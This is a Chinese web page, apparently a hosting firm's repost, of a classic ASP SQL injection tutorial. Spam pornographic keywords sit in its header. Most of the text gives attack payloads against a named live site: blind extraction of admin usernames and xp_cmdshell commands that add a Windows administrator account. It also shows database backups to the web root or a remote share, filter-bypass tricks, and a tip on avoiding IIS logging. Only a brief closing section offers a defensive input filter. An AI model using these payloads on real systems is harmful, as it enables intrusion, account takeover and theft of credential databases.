亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網(wǎng)絡(luò),我們將竭誠為您提供優(yōu)質(zhì)的服務(wù)! 誠征網(wǎng)絡(luò)推廣 | 網(wǎng)站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯(lián)系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業(yè)務(wù)咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發(fā)消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術(shù)支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術(shù)文章 >> 文章瀏覽
技術(shù)文章

ASP注入漏洞全接觸

添加時間:2012-9-4 23:39:39  添加: 思海網(wǎng)絡(luò) 

隨著B/S模式應(yīng)用開發(fā)的發(fā)展,使用這種模式編寫應(yīng)用程序的程序員也越來越多。但是由于這個行業(yè)的入門門檻不高,程序員的水平及經(jīng)驗也參差不齊,相當大一部分程序員在編寫代碼的時候,沒有對用戶輸入數(shù)據(jù)的合法性進行判斷,使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫查詢代碼,根據(jù)程序返回的結(jié)果,獲得某些他想得知的數(shù)據(jù),這就是所謂的SQL Injection,即SQL注入。



SQL注入是從正常的WWW端口訪問,而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別,所以目前市面的防火墻都不會對SQL注入發(fā)出警報,如果管理員沒查看IIS日志的習慣,可能被入侵很長時間都不會發(fā)覺。



但是,SQL注入的手法相當靈活,在注入的時候會碰到很多意外的情況。能不能根據(jù)具體情況進行分析,構(gòu)造巧妙的SQL語句,從而成功獲取想要的數(shù)據(jù),是高手與“菜鳥”的根本區(qū)別。



根據(jù)國情,國內(nèi)的網(wǎng)站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,我們從分入門、進階至高級講解一下ASP注入的方法及技巧,PHP注入的文章由NB聯(lián)盟的另一位朋友zwell撰寫,希望對安全工作者和程序員都有用處。了解ASP注入的朋友也請不要跳過入門篇,因為部分人對注入的基本判斷方法還存在誤區(qū)。大家準備好了嗎?Let's Go...





入 門 篇

如果你以前沒試過SQL注入的話,那么第一步先把IE菜單=>工具=>Internet選項=>高級=>顯示友好 HTTP 錯誤信息前面的勾去掉。否則,不論服務(wù)器返回什么錯誤,IE都只顯示為HTTP 500服務(wù)器錯誤,不能獲得更多的提示信息。



第一節(jié)、SQL注入原理

以下我們從一個網(wǎng)站www.19cn.com開始(注:本文發(fā)表前已征得該站站長同意,大部分都是真實數(shù)據(jù))。

在網(wǎng)站首頁上,有名為“IE不能打開新窗口的多種解決方法”的鏈接,地址為:http://www.19cn.com/showdetail.ASP?id=49,我們在這個地址后面加上單引號’,服務(wù)器會返回下面的錯誤提示:

Microsoft JET Database Engine 錯誤 '80040e14'

字符串的語法錯誤 在查詢表達式 'ID=49'' 中。

/showdetail.ASP,行8

從這個錯誤提示我們能看出下面幾點:

1. 網(wǎng)站使用的是Access數(shù)據(jù)庫,通過JET引擎連接數(shù)據(jù)庫,而不是通過ODBC。

2. 程序沒有判斷客戶端提交的數(shù)據(jù)是否符合程序要求。

3. 該SQL語句所查詢的表中有一名為ID的字段。



從上面的例子我們可以知道,SQL注入的原理,就是從客戶端提交特殊的代碼,從而收集程序及服務(wù)器的信息,從而獲取你想到得到的資料。





第二節(jié)、判斷能否進行SQL注入

看完第一節(jié),有一些人會覺得:我也是經(jīng)常這樣測試能否注入的,這不是很簡單嗎?

其實,這并不是最好的方法,為什么呢?

首先,不一定每臺服務(wù)器的IIS都返回具體錯誤提示給客戶端,如果程序中加了cint(參數(shù))之類語句的話,SQL注入是不會成功的,但服務(wù)器同樣會報錯,具體提示信息為處理 URL 時服務(wù)器上出錯。請和系統(tǒng)管理員聯(lián)絡(luò)。

其次,部分對SQL注入有一點了解的程序員,認為只要把單引號過濾掉就安全了,這種情況不為少數(shù),如果你用單引號測試,是測不到注入點的

  那么,什么樣的測試方法才是比較準確呢?答案如下:

① http://www.19cn.com/showdetail.ASP?id=49

② http://www.19cn.com/showdetail.ASP?id=49 ;;and 1=1

③ http://www.19cn.com/showdetail.ASP?id=49 ;;and 1=2

這就是經(jīng)典的1=1、1=2測試法了,怎么判斷呢?看看上面三個網(wǎng)址返回的結(jié)果就知道了:

可以注入的表現(xiàn):

① 正常顯示(這是必然的,不然就是程序有錯誤了)

② 正常顯示,內(nèi)容基本與①相同

③ 提示BOF或EOF(程序沒做任何判斷時)、或提示找不到記錄(判斷了rs.eof時)、或顯示內(nèi)容為空(程序加了on error resume next)

不可以注入就比較容易判斷了,①同樣正常顯示,②和③一般都會有程序定義的錯誤提示,或提示類型轉(zhuǎn)換時出錯。

  當然,這只是傳入?yún)?shù)是數(shù)字型的時候用的判斷方法,實際應(yīng)用的時候會有字符型和搜索型參數(shù),我將在中級篇的“SQL注入一般步驟”再做分析。





第三節(jié)、判斷數(shù)據(jù)庫類型及注入方法

不同的數(shù)據(jù)庫的函數(shù)、注入方法都是有差異的,所以在注入之前,我們還要判斷一下數(shù)據(jù)庫的類型。一般ASP最常搭配的數(shù)據(jù)庫是Access和SQLServer,網(wǎng)上超過99%的網(wǎng)站都是其中之一。

怎么讓程序告訴你它使用的什么數(shù)據(jù)庫呢?來看看:

SQLServer有一些系統(tǒng)變量,如果服務(wù)器IIS提示沒關(guān)閉,并且SQLServer返回錯誤提示的話,那可以直接從出錯信息獲取,方法如下:

http://www.19cn.com/showdetail.ASP?id=49 ;;and user>0

這句語句很簡單,但卻包含了SQLServer特有注入方法的精髓,我自己也是在一次無意的測試中發(fā)現(xiàn)這種效率極高的猜解方法。讓我看來看看它的含義:首先,前面的語句是正常的,重點在and user>0,我們知道,user是SQLServer的一個內(nèi)置變量,它的值是當前連接的用戶名,類型為nvarchar。拿一個nvarchar的值跟int的數(shù)0比較,系統(tǒng)會先試圖將nvarchar的值轉(zhuǎn)成int型,當然,轉(zhuǎn)的過程中肯定會出錯,SQLServer的出錯提示是:將nvarchar值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為 int 的列時發(fā)生語法錯誤,呵呵,abc正是變量user的值,這樣,不廢吹灰之力就拿到了數(shù)據(jù)庫的用戶名。在以后的篇幅里,大家會看到很多用這種方法的語句。

順便說幾句,眾所周知,SQLServer的用戶sa是個等同Adminstrators權(quán)限的角色,拿到了sa權(quán)限,幾乎肯定可以拿到主機的Administrator了。上面的方法可以很方便的測試出是否是用sa登錄,要注意的是:如果是sa登錄,提示是將”dbo”轉(zhuǎn)換成int的列發(fā)生錯誤,而不是”sa”。

如果服務(wù)器IIS不允許返回錯誤提示,那怎么判斷數(shù)據(jù)庫類型呢?我們可以從Access和SQLServer和區(qū)別入手,Access和SQLServer都有自己的系統(tǒng)表,比如存放數(shù)據(jù)庫中所有對象的表,Access是在系統(tǒng)表[msysobjects]中,但在Web環(huán)境下讀該表會提示“沒有權(quán)限”,SQLServer是在表[sysobjects]中,在Web環(huán)境下可正常讀取。

在確認可以注入的情況下,使用下面的語句:

http://www.19cn.com/showdetail.ASP?id=49 ;;and (select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.ASP?id=49 ;;and (select count(*) from msysobjects)>0

如果數(shù)據(jù)庫是SQLServer,那么第一個網(wǎng)址的頁面與原頁面http://www.19cn.com/showdetail.ASP?id=49是大致相同的;而第二個網(wǎng)址,由于找不到表msysobjects,會提示出錯,就算程序有容錯處理,頁面也與原頁面完全不同。

如果數(shù)據(jù)庫用的是Access,那么情況就有所不同,第一個網(wǎng)址的頁面與原頁面完全不同;第二個網(wǎng)址,則視乎數(shù)據(jù)庫設(shè)置是否允許讀該系統(tǒng)表,一般來說是不允許的,所以與原網(wǎng)址也是完全不同。大多數(shù)情況下,用第一個網(wǎng)址就可以得知系統(tǒng)所用的數(shù)據(jù)庫類型,第二個網(wǎng)址只作為開啟IIS錯誤提示時的驗證。





進 階 篇

在入門篇,我們學會了SQL注入的判斷方法,但真正要拿到網(wǎng)站的保密內(nèi)容,是遠遠不夠的。接下來,我們就繼續(xù)學習如何從數(shù)據(jù)庫中獲取想要獲得的內(nèi)容,首先,我們先看看SQL注入的一般步驟:


第一節(jié)、SQL注入的一般步驟

首先,判斷環(huán)境,尋找注入點,判斷數(shù)據(jù)庫類型,這在入門篇已經(jīng)講過了。

其次,根據(jù)注入?yún)?shù)類型,在腦海中重構(gòu)SQL語句的原貌,按參數(shù)類型主要分為下面三種:

(A) ID=49 這類注入的參數(shù)是數(shù)字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數(shù)為ID=49 And [查詢條件],即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件]


(B) Class=連續(xù)劇 這類注入的參數(shù)是字符型,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續(xù)劇’
注入的參數(shù)為Class=連續(xù)劇’ and [查詢條件] and ‘’=’ ,即是生成語句:
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢條件] and ‘’=’’

(C) 搜索時沒過濾參數(shù)的,如keyword=關(guān)鍵字,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關(guān)鍵字%’
注入的參數(shù)為keyword=’ and [查詢條件] and ‘%25’=’, 即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’



接著,將查詢條件替換成SQL語句,猜解表名,例如:

ID=49 And (Select Count(*) from Admin)>=0

如果頁面就與ID=49的相同,說明附加條件成立,即表Admin存在,反之,即不存在(請牢記這種方法)。如此循環(huán),直至猜到表名為止。

表名猜出來后,將Count(*)替換成Count(字段名),用同樣的原理猜解字段名。

有人會說:這里有一些偶然的成分,如果表名起得很復(fù)雜沒規(guī)律的,那根本就沒得玩下去了。說得很對,這世界根本就不存在100%成功的黑客技術(shù),蒼蠅不叮無縫的蛋,無論多技術(shù)多高深的黑客,都是因為別人的程序?qū)懙貌粐烂芑蚴褂谜弑C芤庾R不夠,才有得下手。

有點跑題了,話說回來,對于SQLServer的庫,還是有辦法讓程序告訴我們表名及字段名的,我們在高級篇中會做介紹。



最后,在表名和列名猜解成功后,再使用SQL語句,得出字段的值,下面介紹一種最常用的方法-Ascii逐字解碼法,雖然這種方法速度很慢,但肯定是可行的方法。

我們舉個例子,已知表Admin中存在username字段,首先,我們?nèi)〉谝粭l記錄,測試長度:

http://www.19cn.com/showdetail.ASP?id=49 ;;and (select top 1 len(username) from Admin)>0

先說明原理:如果top 1的username長度大于0,則條件成立;接著就是>1、>2、>3這樣測試下去,一直到條件不成立為止,比如>7成立,>8不成立,就是len(username)=8

  當然沒人會笨得從0,1,2,3一個個測試,怎么樣才比較快就看各自發(fā)揮了。在得到username的長度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII碼,比如:

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同樣也是用逐步縮小范圍的方法得到第1位字符的ASCII碼,注意的是英文和數(shù)字的ASCII碼在1-128之間,可以用折半法加速猜解,如果寫成程序測試,效率會有極大的提高。



第二節(jié)、SQL注入常用函數(shù)

有SQL語言基礎(chǔ)的人,在SQL注入的時候成功率比不熟悉的人高很多。我們有必要提高一下自己的SQL水平,特別是一些常用的函數(shù)及命令。

Access:asc(字符) SQLServer:unicode(字符)

作用:返回某字符的ASCII碼



Access:chr(數(shù)字) SQLServer:nchar(數(shù)字)

作用:與asc相反,根據(jù)ASCII碼返回字符



Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)

作用:返回字符串從N個字符起長度為L的子字符串,即N到N+L之間的字符串



Access:abc(數(shù)字) SQLServer:abc (數(shù)字)

作用:返回數(shù)字的絕對值(在猜解漢字的時候會用到)



Access:A between B And C SQLServer:A between B And C

作用:判斷A是否界于B與C之間



第三節(jié)、中文處理方法

在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其實只要對中文的編碼有所了解,“中文恐懼癥”很快可以克服。

先說一點常識:

Access中,中文的ASCII碼可能會出現(xiàn)負數(shù),取出該負數(shù)后用abs()取絕對值,漢字字符不變。

SQLServer中,中文的ASCII為正數(shù),但由于是UNICODE的雙位編碼,不能用函數(shù)ascii()取得ASCII碼,必須用函數(shù)unicode ()返回unicode值,再用nchar函數(shù)取得對應(yīng)的中文字符。

了解了上面的兩點后,是不是覺得中文猜解其實也跟英文差不多呢?除了使用的函數(shù)要注意、猜解范圍大一點外,方法是沒什么兩樣的。





高 級 篇

看完入門篇和進階篇后,稍加練習,破解一般的網(wǎng)站是沒問題了。但如果碰到表名列名猜不到,或程序作者過濾了一些特殊字符,怎么提高注入的成功率?怎么樣提高猜解效率?請大家接著往下看高級篇。



第一節(jié)、利用系統(tǒng)表注入SQLServer數(shù)據(jù)庫

SQLServer是一個功能強大的數(shù)據(jù)庫系統(tǒng),與操作系統(tǒng)也有緊密的聯(lián)系,這給開發(fā)者帶來了很大的方便,但另一方面,也為注入者提供了一個跳板,我們先來看看幾個具體的例子:

① http://Site/url.ASP?id=1;exec master..xp_cmdshell “net user name password /add”--

  分號;在SQLServer中表示隔開前后兩句語句,--表示后面的語句為注釋,所以,這句語句在SQLServer中將被分成兩句執(zhí)行,先是Select出ID=1的記錄,然后執(zhí)行存儲過程xp_cmdshell,這個存儲過程用于調(diào)用系統(tǒng)命令,于是,用net命令新建了用戶名為name、密碼為password的windows的帳號,接著:

② http://Site/url.ASP?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--

  將新建的帳號name加入管理員組,不用兩分鐘,你已經(jīng)拿到了系統(tǒng)最高權(quán)限!當然,這種方法只適用于用sa連接數(shù)據(jù)庫的情況,否則,是沒有權(quán)限調(diào)用xp_cmdshell的。

  ③ http://Site/url.ASP?id=1 ;;and db_name()>0

前面有個類似的例子and user>0,作用是獲取連接用戶名,db_name()是另一個系統(tǒng)變量,返回的是連接的數(shù)據(jù)庫名。

④ http://Site/url.ASP?id=1;backup database 數(shù)據(jù)庫名 to disk=’c:\inetpub\wwwroot\1.db’;--

這是相當狠的一招,從③拿到的數(shù)據(jù)庫名,加上某些IIS出錯暴露出的絕對路徑,將數(shù)據(jù)庫備份到Web目錄下面,再用HTTP把整個數(shù)據(jù)庫就完完整整的下載回來,所有的管理員及用戶密碼都一覽無遺!在不知道絕對路徑的時候,還可以備份到網(wǎng)絡(luò)地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。

  ⑤ http://Site/url.ASP?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

前面說過,sysobjects是SQLServer的系統(tǒng)表,存儲著所有的表名、視圖、約束及其它對象,xtype=’U’ and status>0,表示用戶建立的表名,上面的語句將第一個表名取出,與0比較大小,讓報錯信息把表名暴露出來。第二、第三個表名怎么獲取?還是留給我們聰明的讀者思考吧。

⑥ http://Site/url.ASP?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

從⑤拿到表名后,用object_id(‘表名’)獲取表名對應(yīng)的內(nèi)部ID,col_name(表名ID,1)代表該表的第1個字段名,將1換成2,3,4...就可以逐個獲取所猜解表里面的字段名。



  以上6點是我研究SQLServer注入半年多以來的心血結(jié)晶,可以看出,對SQLServer的了解程度,直接影響著成功率及猜解速度。在我研究SQLServer注入之后,我在開發(fā)方面的水平也得到很大的提高,呵呵,也許安全與開發(fā)本來就是相輔相成的吧。



第二節(jié)、繞過程序限制繼續(xù)注入

在入門篇提到,有很多人喜歡用’號測試注入漏洞,所以也有很多人用過濾’號的方法來“防止”注入漏洞,這也許能擋住一些入門者的攻擊,但對SQL注入比較熟悉的人,還是可以利用相關(guān)的函數(shù),達到繞過程序限制的目的。

在“SQL注入的一般步驟”一節(jié)中,我所用的語句,都是經(jīng)過我優(yōu)化,讓其不包含有單引號的;在“利用系統(tǒng)表注入SQLServer數(shù)據(jù)庫”中,有些語句包含有’號,我們舉個例子來看看怎么改造這些語句:

簡單的如where xtype=’U’,字符U對應(yīng)的ASCII碼是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用戶’,可以用where name=nchar(29992)+nchar(25143)代替。



第三節(jié)、經(jīng)驗小結(jié)

1.有些人會過濾Select、Update、Delete這些關(guān)鍵字,但偏偏忘記區(qū)分大小寫,所以大家可以用selecT這樣嘗試一下。

2.在猜不到字段名時,不妨看看網(wǎng)站上的登錄表單,一般為了方便起見,字段名都與表單的輸入框取相同的名字。

3.特別注意:地址欄的+號傳入程序后解釋為空格,%2B解釋為+號,%25解釋為%號,具體可以參考URLEncode的相關(guān)介紹。

4.用Get方法注入時,IIS會記錄你所有的提交字符串,對Post方法做則不記錄,所以能用Post的網(wǎng)址盡量不用Get。

5. 猜解Access時只能用Ascii逐字解碼法,SQLServer也可以用這種方法,只需要兩者之間的區(qū)別即可,但是如果能用SQLServer的報錯信息把值暴露出來,那效率和準確率會有極大的提高。







防 范 方 法

SQL注入漏洞可謂是“千里之堤,潰于蟻穴”,這種漏洞在網(wǎng)上極為普遍,通常是由于程序員對注入不了解,或者程序過濾不嚴格,或者某個參數(shù)忘記檢查導(dǎo)致。在這里,我給大家一個函數(shù),代替ASP中的Request函數(shù),可以對一切的SQL注入Say NO,函數(shù)如下:


Function SafeRequest(ParaName,ParaType)
'--- 傳入?yún)?shù) ---
'ParaName:參數(shù)名稱-字符型
'ParaType:參數(shù)類型-數(shù)字型(1表示以上參數(shù)是數(shù)字,0表示以上參數(shù)為字符)

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "參數(shù)" & ParaName & "必須為數(shù)字型!"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

關(guān)鍵字:ASP注入、數(shù)據(jù)庫、網(wǎng)站

分享到:

頂部 】 【 關(guān)閉
版權(quán)所有:佛山思海電腦網(wǎng)絡(luò)有限公司 ©1998-2024 All Rights Reserved.
聯(lián)系電話:(0757)22630313、22633833
中華人民共和國增值電信業(yè)務(wù)經(jīng)營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網(wǎng)站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網(wǎng)安 舉報有獎  警警  手機打開網(wǎng)站